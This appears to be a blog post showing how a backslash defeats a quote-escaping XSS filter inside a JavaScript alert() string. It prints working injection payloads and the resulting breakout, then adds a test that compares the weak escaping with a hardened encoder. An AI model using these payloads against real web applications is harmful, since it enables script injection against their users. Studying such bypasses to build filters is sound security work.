Bypassing XSS filter in alert msg box

Chintan, Ronnie and I were discussing an issue regarding how to bypass a specific XSS filter in an alert message box. At first we were unable to break out.
Chintan's problem statement was:
I am running into one issue with XSS and was interested if there is any way I can bypass it.
Following is the response code where user-supplied input is embedded. Input is taken via a text box.
<script type="text/javascript">alert('No Information is found for the card 1');</script>

User-supplied input 1 is highlighted in red. I am trying to break out of this alert box; however, when a single quote is given as input, the output is escaped using a backslash. It is as follows:

Input:     1'
Output: <script type="text/javascript">alert('No Information is found for the card 1\'');</script>

I am using IE 8 and tried using back ticks just to check if I could get around this limitation; however, it did not work.
Any suggestion on how to break out of this would be very helpful.

All characters except the single quote, <!-- and </script> are working.
I tried the following vector to escape out:

Input:     1`);alert(1);(`');
Output:
<script type="text/javascript">alert('No Information is found for the card 1`);alert(1);(`');</script>

So, after a series of discussions we came up with the solution: a backslash in the input escapes the backslash the filter inserts, so the single quote that follows is no longer escaped and terminates the string.
;/\');alert(1);//  or   \');alert(\'XSS

And this was the successful bypass:
<script type="text/javascript">alert('No Information is found for the card ;/\\');alert("XSS");//');</script>
So, we successfully bypassed it.
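As an added example (my own code, not from the post or the application discussed), the quote-only escaping rule described above sits next to a hardened encoder; a stub alert records how many calls each generated script makes, so the difference is checkable without a browser. The function names and the PREFIX constant are assumptions chosen to mirror the post's response code.

```javascript
// Constructed example: the message prefix from the post's response code.
const PREFIX = 'No Information is found for the card ';

// The filter described in the post: only the single quote gets a backslash.
// An input backslash escapes the inserted backslash, so the quote survives.
function escapeWeak(input) {
  return input.replace(/'/g, "\\'");
}

// Hardened encoder for a JavaScript string context: JSON.stringify escapes
// backslashes, quotes and control characters; the extra replaces neutralise
// "</script>" and "<!--" inside the script body and the U+2028/2029 line
// terminators that JSON allows but JavaScript string literals do not.
function encodeSafe(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Script body as the vulnerable page builds it (quote-only escaping).
function buildWeak(input) {
  return `alert('${PREFIX}${escapeWeak(input)}');`;
}

// Script body with the whole message encoded as one JavaScript string literal.
function buildSafe(input) {
  return `alert(${encodeSafe(PREFIX + input)});`;
}

// Execute a generated script body with a stub alert and return every message
// it was called with; more than one call means the string was broken out of.
function runWithStubAlert(scriptBody) {
  const calls = [];
  new Function('alert', scriptBody)((msg) => calls.push(String(msg)));
  return calls;
}

// The post's working input: backslash, quote, then injected code and a comment.
const payload = ';/\\\');alert("XSS");//';
console.log(runWithStubAlert(buildWeak(payload)));  // two alerts: breakout
console.log(runWithStubAlert(buildSafe(payload)));  // one alert: payload stays text
```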

Comments

*Adi* said…
Interesting article on XSS Filter Bypassing. Helped a lot. And the best way to bypass filters is by analyzing the outputs for a given input, and then modifying the queries. Like you did.
Cool job! :)
